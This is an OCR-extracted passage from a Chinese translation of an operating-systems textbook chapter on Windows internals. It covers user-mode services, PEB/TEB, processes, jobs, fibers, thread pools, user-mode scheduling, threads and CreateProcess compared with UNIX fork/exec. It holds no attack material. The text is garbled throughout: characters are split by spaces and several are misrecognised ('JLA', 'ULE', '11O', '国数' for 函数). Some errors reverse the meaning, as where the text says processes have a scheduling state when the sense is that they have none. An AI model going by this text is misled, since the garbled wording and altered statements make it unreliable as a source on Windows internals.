有 很 少 更 新 的 时 候 ， 而 不 是 整个 系统 的 个 性 化 的 情况 下 ， 能 够 取得 更 好 的 性 能 。 在 内 核实 现 的 服务 和 在 
用 户 态 进 程 实现 的 服务 之 间 只 有 很 少 的 功能 性 差异 。 内 核 和 过 程 都 提供 了 专用 地 址 空间 ， 可 以 保护 数据 
结构 和 服务 请 求 可 以 被 审议 。 

然而 ， 内 核 态 服务 与 用 户 态 服务 存 在 着 显著 的 性 能 差异 。 通 过 现代 的 硬件 从 用 户 态 进入 内 核 是 很 慢 
的 ， 但 是 也 比 不 上 要 来 回 切换 两 次 的 更 慢 ， 因 为 还 需要 从 内 存 切 换 出 来 进入 另 一 个 进程 。 而 且 跨 进程 通 
信和 带宽 较 低 。 

内 核 态 代码 (非常 仔细 地 ) 可 以 把 用 户 态 处 理 的 数据 作为 参数 传递 给 其 系统 调用 的 方式 来 访问 数据 。 
通过 用 户 态 的 服务 ， 数 据 必须 被 复制 到 服务 进程 或 由 映射 内 存 等 提供 的 一 些 机 制 (Windows 中 的 ALPC 
功能 在 后 台 处 理 ) 。 

将 来 跨 地 址 空间 的 切换 代价 很 可 能 会 越 来 越 小 ， 保 护 模式 将 会 减少 ， 或 甚至 成 为 不 相关 。 在 
Singularity 项 目 中 ， 微 软 研究 院 (Fandrich 等 人 ，2006 年 ) 使 用 运行 时 技术 ， 类 似 C# 和 Java， 用 来 做 一 
个 完全 软件 问题 的 保护 。 这 就 要 求 地 址 空间 的 切换 或 保护 模式 下 没有 硬件 的 切换 代价 。 

Windows 利 用 用 户 态 的 服务 进程 极 大 地 提升 了 系统 的 性 能 。 其 中 一 些 服务 是 与 内 核 的 组 件 紧 密 相关 
的 ， 例 如 lsass.exe 这 个 本 地 安全 身份 验证 服务 ， 它 管理 了 表示 用 户 身份 的 令 牌 (token) 对 象 ， 以 及 文件 
系统 用 来 加 密 的 密 钥 。 用 户 态 的 即 插 即 用 管理 器 负责 确定 要 使 用 新 的 硬件 设备 所 需要 的 正确 的 驱动 程序 
来 安装 它 ， 并 告诉 内 核 加 载 它 。 系 统 的 很 多 功能 是 由 第 三 方 提供 的 ， 如 防 病毒 程序 和 数字 版 权 管理 ， 这 
些 功 能 都 是 作为 内 核 态 驱动 程序 和 用 户 态 服务 的 组 合 方式 实现 的 。 

在 Windows 中 taskmgr.exe 有 一 个 选项 卡 ， 标 识 在 系统 上 运行 的 服务 。( 早 期 版 本 的 Windows 将 显 
示 服 务 使 用 net start 命令 的 列表 )。 很 多 服务 是 运行 在 同一 进程 (svchost.exe) 中 的 。Windows 也 利用 
这 种 方式 来 处 理 自己 启动 时 间 的 服务 ， 以 减少 启动 系统 所 需 的 时 间 。 服 务 可 以 合并 到 相同 的 进程 ， 只 要 
它们 能 安全 地 使 用 相同 的 安全 凭据 。 

在 每 个 共享 的 服务 进程 内 ， 个 体 服务 是 以 DLL 的 形式 加 载 的 。 它 们 通常 利用 Win32 的 线程 池 功 能 来 
共享 一 个 线程 地 ， 这 样 对 于 所 有 的 服务 ， 只 需要 运行 最 小 数目 的 线程 。 

服务 是 系统 中 常见 的 安全 漏洞 的 来 源 ， 因 为 它们 是 经 常 是 可 以 远程 访问 的 (取决 于 TCP/IP 防火 墙 和 
IP 安全 设置 )， 且 不 是 所 有 程序 员 都 是 足够 仔细 的 ， 他 们 很 可 能 没有 验证 通过 RPC 传 递 的 参数 和 缓冲 区 。 

一 直 在 Windows 中 运行 的 服务 的 数目 是 令 人 惊讶 的 。 但 这 些 服务 中 的 很 少 一 部 分 不 断 收 到 单个 请 求 ， 
如 果 有 ， 那 这 样 的 进程 看 起 来 就 像 是 远程 的 攻击 者 试图 找到 系统 的 漏洞 。 结 果 是 越 来 越 多 的 服务 在 
Windows 中 被 默认 为 是 关闭 的 ， 特 别 是 Windows Server 的 相关 版 本 。 


11.4 Windows 中 的 进程 和 线程 


Windows 具有 大 量 的 管理 CPU 和 资源 分 组 的 概念 。 以 下 各 节 中 ， 我 们 将 讨论 有 关 的 Win32 API 的 调 
用 ， 并 介绍 它们 是 如 何 实现 的 。 


11.4.1 基本 概念 

在 Windows 中 ， 进 程 是 程序 的 容器 。 它 们 持 有 的 虚拟 地 址 空间 ， 以 及 指向 内 核 态 的 对 象 的 线程 的 
句柄 。 作 为 线程 的 容器 ， 它 们 提供 线程 执行 所 需要 的 公共 资源 ， 例 如 配额 结构 的 指针 、 共 享 的 令 牌 对 象 
以 及 用 来 初始 化 线程 的 默认 参数 ， 包 括 优先 次 序 和 调度 类 。 每 个 进程 都 有 用 户 态 系统 数据 ， 称 为 PEB 
(进程 环境 块 )。PEB 包 括 已 加 载 的 模块 (如 EXE 和 DLL) 列表 ， 包 含 环 境 字 符 串 的 内 存 、 当 前 的 工作 
, 目录 和 管理 进程 堆 的 数据 一 一 以 及 很 多 随 着 时 间 的 推移 已 添加 的 Win32 cruft。 

线程 是 在 Windows 中 调度 CPU 的 内 核 抽象 。 优 先 级 是 基于 进程 中 包含 的 优先 级 值 来 为 每 个 线程 分 配 
的 。 线 程 也 可 以 通过 亲 和 处 理 只 在 某 些 处 理 器 上 运行 。 这 有 助 于 显 式 分 发 多 处 理 器 上 运行 的 并 发 程序 的 
工作 。 每 个 线程 都 有 两 个 单独 调用 堆栈 ， 一 个 在 用 户 态 执行 ， 另 一 个 内 核 态 执行 。 也 有 TEB (线程 环境 
块 ) 使 用 户 态 数据 指定 到 线程 ， 包 括 每 个 线程 存储 区 (线程 本 地 存储 区 ) 和 Win32 字 段 、 语 言 和 文化 本 
地 化 以 及 其 他 专门 的 字段 ， 这 些 字段 都 被 各 种 不 同 的 功能 添加 上 了 。 

除了 PEB 与 TEB 外 ， 还 有 另 一 个 数据 结构 ， 内 核 态 与 每 个 进程 共享 的 ， 即 用 户 共享 数据 。 这 个 是 可 
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以 由 内 核 写 的 页 ， 但 是 每 个 用 户 态 进程 只 能 读 。 它 包含 了 一 系列 的 由 内 核 维护 的 值 ， 如 各 种 时 间 、 版 本 
信息 、 物 理 内 存 和 大 量 的 被 用 户 态 组 件 共 享 的 标志 ， 如 COM、 终 端 服务 和 调试 程序 。 有 关 使 用 此 只 读 
的 共享 页 ， 纯 粹 是 出 于 性 能 优化 的 目的 ， 因 为 值 也 能 获得 通过 系统 调用 到 内 核 态 获得 。 但 系统 调用 比 一 
个 内 存 访 问 代 价 大 很 多 ， 所 以 对 于 大 量 由 系统 维护 的 字段 ， 例 如 时 间 ， 这 样 的 处 理 就 很 有 意义 。 其 他 字 
段 ， 如 当前 时 区 更 改 很 少 ， 但 依赖 于 这 些 字段 的 代码 必须 查询 它们 往往 只 是 看 它们 是 否 已 更 改 。 

1. 进程 

进程 创建 是 从 段 对 象 创建 的 ， 每 个 段 对 象 描述 了 磁盘 上 某 个 文件 的 一 个 内 存 对 象 。 在 创建 一 个 过 程 
时 创建 的 进程 将 接收 一 个 句柄 ， 这 个 句柄 允许 它 通过 映射 段 、 分 配 虚拟 内 存 、 写 参数 和 环境 变量 数据 、 
复制 文件 描述 符 到 它 的 句柄 表 、 创 建 线程 来 修改 新 的 进程 。 这 非常 不 同 于 在 UNIX 中 创建 进程 的 方式 ， 
反映 了 Windows 与 UNIX 初始 设计 目标 系统 的 不 同 。 

正如 11.1 节 所 描述 ， UNIX 是 为 16 位 单 处 理 器 系统 设计 的 ， 而 这 样 的 单 处 理 器 系统 是 用 于 在 进程 之 间 
交换 共享 内 存 的 。 这 样 的 系统 中 ， 进 程 作为 并 发 的 单元 ， 并 且 使 用 像 fork 这 样 的 操作 来 创建 进程 是 一 个 天 
才 般 的 设计 主意 。 如 果 要 在 很 小 的 内 存 中 运行 一 个 新 的 进程 ， 并 且 没 有 硬件 支持 的 虚拟 内 存 ， 那 么 在 内 存 
中 的 进程 就 不 得 不 换 出 到 磁盘 以 创建 空间 。UNIX 操 作 系统 (一 种 多 用 户 的 计算 机 操作 系统 ) 最 初 仅仅 通 
过 简单 的 父 进程 交换 技术 和 传递 其 物理 内 存 给 它 的 子 进程 来 实现 fork。 这 种 操作 和 运行 几乎 是 没有 代价 的 。 

相 比 之 下 ， 在 Cutler 小 组 开发 NT 的 时 代 ， 当 时 的 硬件 环境 是 32 位 多 处 理 器 系统 与 虚拟 内 存 硬 件 共 享 
1 一 16 兆 字 节 的 物理 内 存 。 多 处 理 器 为 部 分 程序 并 行 运行 提供 了 可 能 ， 因此 NT 使 用 进程 作为 共享 内 存 和 
数据 资源 的 容器 ， 并 使 用 线程 作为 并 发 调度 单元 。 

当然 ， 随 后 几 年 里 的 系统 就 完全 不 同 于 这 些 环境 了 。 例 如 拥有 64 位 地 址 空间 并 且 一 个 芯片 上 集成 十 
JLA (乃至 数 百 个 ) CPU 内 核 或 数 百 GB 的 物理 内 存 。 这 些 内 存 和 传统 内 存 完全 不 一 样 。 现 在 的 RAM 内 
存在 关闭 电源 时 会 丢失 里 面 的 内 容 ， 但 是 正在 生产 的 phase-change 内 存 会 像 硬盘 一 样 ， 在 断 电 之 后 仍然 
能 保存 其 拥有 的 内 容 。 此 外 ， 还 有 替代 现 有 硬盘 的 闪存 设备 ， 更 广泛 虚拟 化 、 普 适 网 络 的 支持 ， 以 及 例 
如 事务 型 内 存 (transactional memory) 这 类 同步 技术 的 创新 。 Windows 和 UNIX 操 作 系 统 无 疑 将 继续 适 
应 现实 中 新 的 硬件 ， 但 我 们 更 感 兴趣 的 是 ， 会 有 哪些 新 的 操作 系统 会 基于 新 硬件 而 被 特别 设计 出 来 。 

2. 作业 和 纤 程 

Windows 可 以 将 进程 分 组 为 作业 ， 但 作业 抽象 并 不 足够 通用 。 原 因 是 其 专 为 限制 分 组 进程 所 包含 的 
线程 而 设计 ， 如 通过 限制 共享 资源 配额 、 强 制 执行 受 限 令 牌 (restricted token) 来 阻止 线程 访问 许多 系 
统 对 象 。 作 业 最 重要 的 特性 是 一 旦 一 个 进程 在 作业 中 ， 该 进程 创建 的 进程 、 线 程 也 在 该 作业 中 ， 没 有 特 
例 。 就 像 它 的 名 字 所 示 ， 作 业 是 为 类 似 批 处 理 环境 而 非 交互 式 计算 环境 而 设计 的 。 

在 现代 Windows 中 ， 作 业 被 组 织 在 一 起 来 处 理 现代 应 用 。 这 些 构成 运行 的 应 用 程序 进程 需要 被 操作 
系统 额外 识别 出 来 以 便 管 理 整 个 应 用 。 

图 11-22 显 示 了 人 作业、 进程、 线程 和 纤 程 之 间 的 关系 。 作 业 包 含 进 程 ， 进 程 包含 线程 ， 但 是 线程 不 
包含 纤 程 。 线 程 与 纤 程 通常 是 多 对 多 的 关系 。 





图 11-22 作业 、 进 程 、 线 程 、 纤 程 之 间 的 关系 。 作 业 和 纤 程 是 可 选 的， 并 不 是 所 有 的 进程 都 在 作业 中 或 者 
包含 纤 程 


纤 程 通过 分 配 栈 与 用 来 存储 纤 程 相关 寄存 器 和 数据 的 用 户 态 纤 程 数据 结构 来 创建 。 线 程 被 转换 为 纤 
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程 ， 但 纤 程 也 可 以 独立 于 线程 创建 。 这 些 新 创建 的 纤 程 直到 一 个 已 经 运行 的 纤 程 显 式 地 调用 
SwitchToFiber 函 数 才 开始 执行 。 由 于 线程 可 以 尝试 切换 到 一 个 已 经 在 运行 的 纤 程 ， 因 此 ， 程 序 员 必 须 
使 用 同步 机 制 以 防止 这 种 情况 发 生 。 

纤 程 的 主要 优点 在 于 纤 程 之 间 的 切换 开销 要 远 远 小 于 线程 之 间 的 切换 。 线 程 切换 需要 进出 内 核 而 纤 
程 切 换 仅 需要 保存 和 恢复 几 个 寄存 器 。 

尽管 纤 程 是 协同 调度 的 ， 如 果 有 多 个 线程 调度 纤 程 ， 则 需要 非常 小 心地 通过 同步 机 制 以 确保 纤 程 之 
间 不 会 互相 和 干扰。 为 了 简化 线程 和 纤 程 之 间 的 交互 ， 通 常 创建 和 能 运行 它们 的 内 核 数目 一 样 多 的 线程 ， 
并 且 让 每 个 线程 只 能 运行 在 一 套 可 用 的 处 理 器 甚至 只 是 一 个 单一 的 处 理 器 上 。 . 

每 个 线程 可 以 运行 一 个 独立 的 纤 程 子 集 ， 从 而 建立 起 线程 和 纤 程 之 间 一 对 多 的 关系 来 简化 同步 。 即 
便 如 此 ， 使 用 纤 程 仍然 有 许多 困难 。 大 多 数 的 Win32 库 是 完全 不 识别 纤 程 的 ， 并 且 尝 试 像 使 用 线程 一 样 
使 用 纤 程 的 应 用 会 遇 到 各 种 错误 。 由 于 内 核 不 识别 纤 程 ， 当 一 个 纤 程 进入 内 核 时 ， 其 所 属 线 程 可 能 阻塞 。 
此 时 处 理 器 会 调度 任意 其 他 线程 ， 导 致 该 线程 的 其 他 纤 程 均 无 法 运行 。 因 此 纤 程 很 少 使 用 ， 除 非 从 其 他 
系统 移植 那些 明显 需要 纤 程 提供 功能 的 代码 。 

3. 线程 池 与 用 户 态 调度 

Win32 的 线程 池 是 为 了 一 些 特定 的 程序 而 在 Windows 线 程 模型 上 进行 的 更 好 的 抽象 。 在 其 他 任务 想 
要 利用 多 核 处 理 器 时 ， 某 个 线程 想 要 并 行 运行 一 个 小 任务 ， 此 时 创建 线程 太 过 昂贵 。 小 任务 可 以 被 组 织 
起 来 成 为 大 任务 ， 但 是 这 样 的 方法 减少 了 程序 中 可 以 被 利用 的 并 发 性 。 一 种 可 替代 的 方法 是 ， 对 于 某 一 
个 特定 的 程序 ， 只 分 配 特定 数目 的 线程 ， 并 且 维 持 一 个 需要 运行 的 任务 队列 。 当 一 个 线程 结束 任务 的 运 
行 时 ， 它 便 从 任务 队列 里 取出 一 个 新 的 任务 。 这 个 模型 解决 了 编程 模型 中 的 资源 管理 问题 《有 多 少 处 理 
器 目前 是 可 用 的 ? 需要 创建 多 少 线程 ”目前 的 任务 是 什么 ?这 些 任务 之 间 如 何 同步 ?)。Windows 将 这 个 
解决 方案 正式 放 在 的 Win32 线 程 池 中 ， 有 一 系列 的 API 用 于 自动 管理 动态 线程 池 ， 并 且 能 将 任务 分 配 到 
线程 池上 。 

线程 地 并 非 一 个 完美 的 解决 方案 。 因 为 当 一 个 任务 中 的 某 些 进程 由 于 一 些 资源 的 原因 而 阻塞 时 ， 线 
程 没 法 切换 到 另外 一 个 任务 上 去 。 因 此 ， 线 程 池 也 会 不 可 避免 地 创建 出 比 可 用 处 理 器 数量 更 多 的 线程 ， 
这 样 在 其 他 线程 被 阻塞 时 ， 可 运行 的 线程 才能 得 到 调度 。 线 程 池 集成 了 许多 常见 的 同步 化 机 制 ， 例 如 对 
于 IO 请 求 的 等 待 或 者 当 内 核 请 求 发 生 时 得 到 阻塞 。 同 步 策略 可 以 被 当成 任务 调度 的 触发 器 ， 这 样 一 来 ， 
在 任务 准备 好 运行 之 前 就 可 以 将 线程 分 配给 它 。 

实现 线程 池 的 技术 与 实现 IO 请 求 的 同步 策略 所 采用 的 技术 是 一 致 的 ， 如 调度 策略 和 内 核 态 线程 工 
厂 (用 于 添加 足够 的 线程 数 ， 以 保证 在 处 理 器 忙 的 时 候 也 有 足够 的 工作 线程 )。 在 许多 应 用 中 都 存在 小 
型 任务 ， 特 别 是 在 给 C/S 架 构 计 算 模 型 提供 服务 的 应 用 中 (在 这 些 应 用 里 ， 客 户 端 会 给 服务 器 端 发 送 一 
大 堆 请 求 )。 在 这 些 场 景 中 使 用 线程 池 技 术 ， 能 够 减少 由 于 创建 线程 所 产生 的 开销 ， 并 且 将 管理 线程 池 
的 责任 从 应 用 程序 移 向 了 操作 系统 。 

每 一 个 程序 员 看 到 的 Windows 线 程 实际 上 都 是 两 条 线程 : 一 条 运行 在 内 核 态 里 ， 一 条 运行 在 用 户 态 
里 。 这 和 UNIX 的 机 制 是 一 样 的 ， 每 一 条 线程 都 会 各 自 创 建 它 自己 的 栈 和 内 存 ， 从 而 在 不 运行 的 时 候 节 
省 寄存 器 。 这 两 条 线程 被 认为 是 一 条 线程 ， 这 是 因为 它们 不 在 同一 时 间 运 行 。 用 户 态 的 线程 运作 方式 像 
是 内 核 态 线程 的 延展 ， 只 在 内 核 态 切换 到 用 户 态 的 情况 下 才 运 行 。 当 用 户 态 线程 想 要 执行 系统 调用 、 发 
生 了 缺 页 中 断 或 发 生 了 预先 抢占 时 ， 操 作 系统 会 陷入 内 核 态 ， 并 在 用 户 态 与 内 核 态 的 对 应 线程 之 间 相 互 
切换 。 

在 大 部 分 时 间 ， 用 户 态 和 内 核 态 的 最 大 区 别 都 是 对 于 程序 员 的 透明 性 。 但 是 ， 从 Windows 7 开始 ， 
微软 公司 添加 了 一 个 新 的 功能 UMS (用 户 态 调 度 模块 )， 使 得 这 一 区 别 产 生 了 变化 。UMS 类 似 于 其 他 操 
作 系统 中 的 scheduler acivation， 可 以 在 不 进入 内 核 态 的 情况 下 在 用 户 态 切换 线程 。 由 于 其 采用 的 是 
Win32 的 真实 线程 ， 因 此 相对 纤 程 而 言 有 着 与 Win32 更 好 的 集成 性 。 

实现 UMS 时 有 三 个 关键 元 素 需 要 注意 : 

1) 用 户 态 切 换 : 用 户 态 的 调度 器 需要 做 到 不 进入 内 核 态 即 可 切换 用 户 线 程 , 当 用 户 线程 进入 内 核 态 ， 
UMS 会 找到 运营 的 内 核 态 线程 ， 并 且 切 换 到 内 核 态 。 
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2) 重新 进入 用 户 态 的 调度 器 : 当 执 行内 核 态 线程 时 阻塞 并 需要 等 待 系统 资源 时 ，UMS 会 切换 到 一 
个 特殊 的 用 户 线程 ， 并 且 执 行 用 户 态 调度 器 ， 使 得 不 同 的 用 户 线程 也 可 以 被 调度 到 当前 处 理 器 上 。 这 样 
就 使 得 当前 进程 可 以 继续 使 用 当前 的 处 理 器 ， 而 不 像 整 体 调 度 时 那样 要 等 待 其 他 进程 先 运行 。 

3) 系统 调用 的 完整 性 ， 当 阻塞 的 内 核 线程 最 终结 束 时 ， 需 要 产生 一 个 包含 对 应 的 系统 调用 结果 信息 的 
消息 ， 并 返回 给 对 应 的 等 待 的 用 户 态 调度 器 ， 使 得 对 应 的 用 户 线程 能 够 在 下 一 次 需要 调度 时 不 出 现 问题 。 

Windows 中 的 UMS 并 不 包含 用 户 态 的 调度 器 。UMS 被 计划 为 一 个 低级 功能 ， 并 且 被 高 级 编程 语言 
服务 应 用 程序 的 实时 运行 库 直 接 用 于 实现 轻 量 级 的 线程 模型 ， 这 些 轻 量 级 的 线程 模型 不 会 与 内 核 态 线程 调 
度 发 生 冲 突 。 这 些 实时 运行 库 一 般 会 用 于 实现 当前 环境 的 用 户 态 调 度 器 。 对 于 之 前 模式 的 总 结 见 图 11-23。 
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图 11-23 CPU 和 资源 管理 中 使 用 的 基本 概念 





4. 线程 

通常 每 一 个 进程 是 由 一 个 线程 开始 的 ， 但 一 个 新 的 进程 也 可 以 动态 创建 线程 。 线 程 是 CPU 调度 的 基 
本 单位 ， 因 为 操作 系统 总 是 选择 一 个 线程 而 不 是 进程 来 运行 。 因 此 ， 每 一 个 线程 有 一 个 调度 状态 (就绪 
态 、 运 行 态 、 阻 塞 态 等 ) ， 而 进程 设 有 调度 状态 。 线 程 可 以 通过 调用 指定 了 在 其 所 属 进程 地 址 空间 中 的 
开始 运行 地 址 的 Win32 库 函数 动态 创建 。 

每 一 个 线程 均 有 一 个 线程 ID ， 其 和 进程 ID 取 自 同一 空间 ， 因 此 单一 的 ID 不 可 能 同时 被 一 个 线程 和 一 
个 进程 使 用 。 进 程 和 线程 的 ID 是 4 的 倍数 , 因为 它们 实际 上 是 通过 用 于 分 配 ID 的 特殊 句柄 表 来 执行 分 配 的 。 
该 系统 复 用 了 如 图 11-16 和 图 11-17 所 示 的 可 扩展 句柄 管理 功能 。 句 柄 表 没有 对 象 的 引用 ， 但 使 用 指针 指向 
进程 或 线程 ， 使 通过 ID 查找 一 个 进程 或 线程 非常 有 效 。 最 新 版 本 的 Windows 采 用 先进 先 出 顺序 管理 空闲 
句柄 列表 ， 使 ID 无 法 马上 重复 使 用 。ID 马 上 被 重复 使 用 的 问题 将 在 本 章 的 最 后 问题 部 分 再 讨论 。 

线程 通常 在 用 户 态 运行 ， 但 是 当 它 进 行 一 个 系统 调用 时 ， 就 切换 到 内 核 态 ， 并 以 其 在 用 户 态 下 相同 
的 属性 以 及 限制 继续 运行 。 每 个 线程 有 两 个 堆栈 ， 一 个 在 用 户 态 使 用 ， 而 另 一 个 在 内 核 态 使 用 。 任 何 时 
候 当 一 个 线程 进入 内 核 态 ， 其 切换 到 内 核 态 堆栈 。 用 户 态 寄存 器 的 值 以 上 下 文 (context) 数据 结构 的 形 
式 保存 在 该 内 核 态 堆栈 底部 。 因 为 只 有 进入 内 核 态 的 用 户 态 线程 才 会 停止 运行 ， 当 它 没 有 运行 时 该 上 下 
文 数据 结构 中 总 是 包括 了 其 寄存 器 状态 。 任 何 拥有 线程 句柄 的 进程 可 以 查看 并 修改 这 个 上 下 文 数据 结构 。 

线程 通常 使 用 其 所 属 进程 的 访问 令 牌 运行 ， 但 在 某 些 涉及 客户 机 /服务 器 计算 的 情况 下 ， 一 个 服务 
器 线程 可 能 需要 模拟 其 客户 端 ， 此 时 需要 使 用 基于 客户 端 令 牌 的 临时 令 牌 标识 来 执行 客户 的 操作 。( 一 
般 来 说 服务 器 不 能 使 用 客户 端的 实际 令 牌 ， 因 为 客户 端 和 服务 器 可 运行 于 不 同 的 系统 。) 

1/O 处 理 也 经 常 需要 关注 线程 。 当 执行 同步 11O 时 会 阻塞 线程 ， 并 且 异 步 10 相 关 的 未 完成 的 LO 请 求 
也 关联 到 线程 。 当 一 个 线程 完成 执行 ， 它 可 以 退出 ， 此 时 任何 等 待 该 线程 的 MO 请 求 将 被 取消 。 当 进程 
中 最 后 一 个 活跃 线程 退出 时 ， 这 一 进程 将 终止 。  . 

需要 注意 的 是 线程 是 一 个 调度 的 概念 ， 而 不 是 一 个 资源 所 有 权 的 概念 。 任 何 线程 可 以 访问 其 所 属 进 
程 的 所 有 对 象 ， 只 需要 使 用 句柄 值 ， 并 进行 合适 的 Win32 调 用 。 一 个 线程 并 不 会 因为 一 个 不 同 的 线程 创 
建 或 打开 了 一 个 对 象 而 无 法 访问 它 。 系 统 甚至 没有 记录 是 哪 一 个 线程 创建 了 哪 一 个 对 象 。 一 旦 一 个 对 象 
句柄 已 经 在 进程 句柄 表 中 ， 任 何在 这 一 进程 中 的 线程 均 可 使 用 它 ， 即 使 它 是 在 模拟 另 一 个 不 同 的 用 户 。 

正如 前 面 所 述 ， 除 了 用 户 态 运行 的 正常 线程 ，Windows 有 许多 只 能 运行 在 内 核 态 的 系统 线程 ， 而 其 
与 任何 用 户 态 进程 都 没有 联系 。 所 有 这 一 类 型 的 系统 线程 运行 在 一 个 特殊 的 称 为 系统 进程 的 进程 中 。 该 
进程 没有 用 户 态 地 址 空间 ， 其 提供 了 线程 在 不 代表 某 一 特定 用 户 态 进程 执行 时 的 环境 。 当 学 到 内 存 管理 
的 时 候 ， 我 们 将 讨论 这 样 的 一 些 线程 。 这 些 线程 有 的 执行 管理 任务 ， 例 如 写 脏 页 面 到 磁盘 上 ， 而 其 他 形 
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成 了 工作 线程 地 ， 来 分 配 并 执行 部 件 或 驱动 程序 需要 系统 进程 执行 的 工作 。 


11.4.2 人 作业、 进程、 线程 和 纤 程 管理 API 调 用 

新 的 进程 是 由 Win32 API 函 数 CreatProcess 创 建 的 。 这 个 函数 有 许多 参数 和 大 量 的 选项 ， 包 括 被 执 
行文 件 的 名 称 、 命 令 行 字符 串 (未 解析 ) 和 一 个 指向 环境 字符 串 的 指针 。 其 中 也 包括 了 控制 诸多 细节 的 
令 牌 和 数值 ， 这 些 细节 包括 了 如 何 配置 进程 和 第 一 个 线程 的 安全 性 ， 调 试 配置 和 调度 优先 级 等 。 其 中 一 
个 令 牌 指定 创建 者 打开 的 句柄 是 否 被 传递 到 新 的 进程 中 。 该 函数 还 接受 当前 新 进程 的 工作 目录 和 可 选 的 
带 有 关于 此 进程 使 用 GUI 窗口 的 相关 信息 的 数据 结构 。Win32 对 新 进程 和 其 原始 线程 都 返回 ID 和 句柄 ,而 
非 只 为 新 进程 返回 一 个 ID 号 。 

Create 使 用 大 量 参数 ， 这 揭示 了 Windows 和 UNIX 在 进程 创建 的 开发 设计 上 的 诸多 的 不 同 之 处 。 

1) 寻找 执行 程序 的 实际 搜索 路 径 隐藏 在 Win32 的 库 代 码 里 ， 但 UNIX 中 则 显 式 地 管理 该 信息 。 

2) 当前 工作 目录 在 UNIX 操 作 系 统 里 是 一 个 内 核 态 的 概念 ， 但 是 在 Windows 里 是 用 户 态 字 符 串 。 
Windows 为 每 个 进程 都 打开 当前 目录 的 一 个 句柄 ， 这 导致 了 和 UNIX 一 样 的 麻烦 : 除了 碰巧 工作 目录 是 
跨 网 络 的 情况 下 可 以 删除 它 ， 其 他 工作 目录 都 是 不 能 删除 的 。 

3) UNIX 解 析 命 令 行 ， 并 传递 参数 数组 ， 而 Win32 需 要 每 个 程序 自己 解析 参数 。 其 结果 是 ， 不 同 的 
程序 可 能 采用 不 一 致 的 方式 处 理 通 配 符 (如 *.txt) 和 其 他 特殊 字符 。 

4) 在 UNIX 中 ， 文 件 描述 符 是 否 可 以 被 继承 是 句柄 的 一 个 属性 。 不 过 在 Windows 中 ， 其 同时 是 句柄 
和 进程 创建 参数 的 属性 。 

5) Win32 是 面向 图 形 用 户 界面 的 ， 因 此 新 进程 能 直接 获得 其 窗口 信息 ， 而 在 UNIX 中 ， 这 些 信息 是 
通过 参数 传递 给 图 形 用 户 界 面 程序 的 。 

6) Windows 中 的 可 执行 代码 没有 SETUID 位 属性 ， 不 过 一 个 进程 也 可 以 为 另 一 个 用 户 创建 进程 ， 只 
要 其 能 获得 该 用 户 的 信用 凭证 。 

7) Windows 返 回 的 进程 、 线 程 句柄 可 以 用 在 很 多 独立 的 方法 中 修改 新 进程 /线程 ， 例 如 复制 句柄 、 
在 新 进程 中 设置 环境 变量 等 。UNIX 则 只 在 fork 和 exec 调 用 的 时 候 修改 新 进程 ， 以 及 只 有 几 种 特定 的 情 
ULE (例如 exec) 会 将 用 户 态 的 状态 抛 出 进程 。 

这 些 不 同 有 些 是 来 自 历史 原因 和 哲学 原因 。UNIX 的 设计 是 面向 命令 行 的 ， 而 不 是 像 Windows 那 样 
面向 图 形 用 户 界 面 的 。UNIX 的 用 户 相 比 来 说 更 高 级 ， 同 时 也 懂得 像 PATH 环 境 变 量 的 概念 。Windows 继 
承 了 很 多 MS-DOS 中 的 东西 。 

这 种 比较 也 有 点 偏颇 ， 因 为 Win32 是 一 个 用 户 态 下 的 对 NT 本 地 进程 执行 的 包装 器 ， 就 像 UNIX 下 的 
系统 库 国 数 fork/exec 的 封装 。 实 际 的 NT 中 创建 进程 和 线程 的 系统 调用 NtCreateProcess 和 NtCreateThread 
比 Win32 版 本 简单 得 多 。NT 进 程 创 建 的 主要 参数 包括 代表 所 要 运行 的 程序 文件 句柄 、 一 个 指定 新 进程 是 
否 默认 继承 创建 者 句柄 的 标志 ， 以 及 有 关 安 全 模型 的 相关 参数 。 由 于 用 户 态 下 的 代码 能 够 使 用 新 建 进程 
的 句柄 对 新 进程 的 虚拟 地 址 空间 进行 直接 的 操作 ， 所 有 关于 建立 环境 变量 、 创 建 初 始 线程 的 细节 就 留 给 
用 户 态 代码 来 解决 。 

为 了 支持 POSIX 子 系统 ， 本 地 进程 创建 有 一 个 选项 可 以 指定 ， 通 过 拷贝 另 一 个 进程 的 虚拟 地 址 空 
间 来 创建 一 个 新 进程 ， 而 不 是 通过 映射 一 个 新 程序 的 段 对 象 来 新 建 进程 。 这 种 方式 只 用 在 实现 POSIX 的 
fork， 而 不 是 Win32 的 。 但 自从 最 新 的 Windows 开 始 不 再 支持 POSIX 标 准 ， 进 程 拷贝 就 变 得 没什么 用 处 
了 。 可 能 只 是 一 些 公司 中 的 开发 者 们 在 特定 情况 下 用 于 开发 ， 类 似 于 在 UNIX 中 使 用 fork 时 不 调用 exec 
一 样 。 
线程 创建 时 传 给 新 线程 的 参数 包括 : CPU 的 上 下 文 信息 (包括 栈 指针 和 起 始 指 令 地 址 )、TEB 模 板 、 
一 个 表示 线程 创建 后 马上 运行 或 以 挂 起 状态 创建 (等 待 有 人 对 线程 句柄 调用 NtResumeThread 函 数 ) 的 标 
志 。 用 户 态 下 的 栈 的 创建 以 及 argv/argc 参 数 的 压 入 需要 由 用 户 态 下 的 代码 来 解决 ， 必 须 对 进程 句柄 调用 
原生 NT 的 内 存 管理 API。 

在 Windows Vista 的 发 行 版 中 ， 包 含 了 一 个 新 的 关于 进程 操作 方面 的 本 地 API 一 一 
NtCreateUserProcess， 这 个 接口 将 原来 许多 用 户 态 下 的 步骤 转移 到 了 内 核 态 下 执行 ， 同 时 将 进程 创建 与 
起 始 线程 创建 绑 定 在 一 起 进行 。 做 这 种 改变 的 原因 是 支持 通过 进程 划分 信任 边界 。NtCreateUserProcess 
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人 允许 进程 也 提供 信任 的 边界 ， 但 是 这 种 方法 创建 的 进程 在 不 同 的 信任 环境 中 ， 并 没有 足够 的 权利 在 用 户 
态 下 实现 进程 创建 的 细节 。 一 般 来 说 主要 用 法 是 将 这 些 不 同 的 进程 用 在 不 同 信任 边界 中 ( 称 为 受 保护 的 
进程 ) 以 提供 一 种 数字 权限 管理 (可 以 保证 受 版 权 保护 的 材料 不 受到 不 正当 的 使 用 ) 。 当 然 ， 受 保护 的 
进程 只 能 针对 用 户 态 的 攻击 ， 而 无 法 预防 内 核 态 的 攻击 。 

1. 进程 间 通 信 . 

线程 间 可 以 通过 多 种 方式 进行 通信 , 包括 管道 、 命 名 管道 、 邮 件 槽 、 套 接 字 、 远 程 过 程 调用 (RPC), 
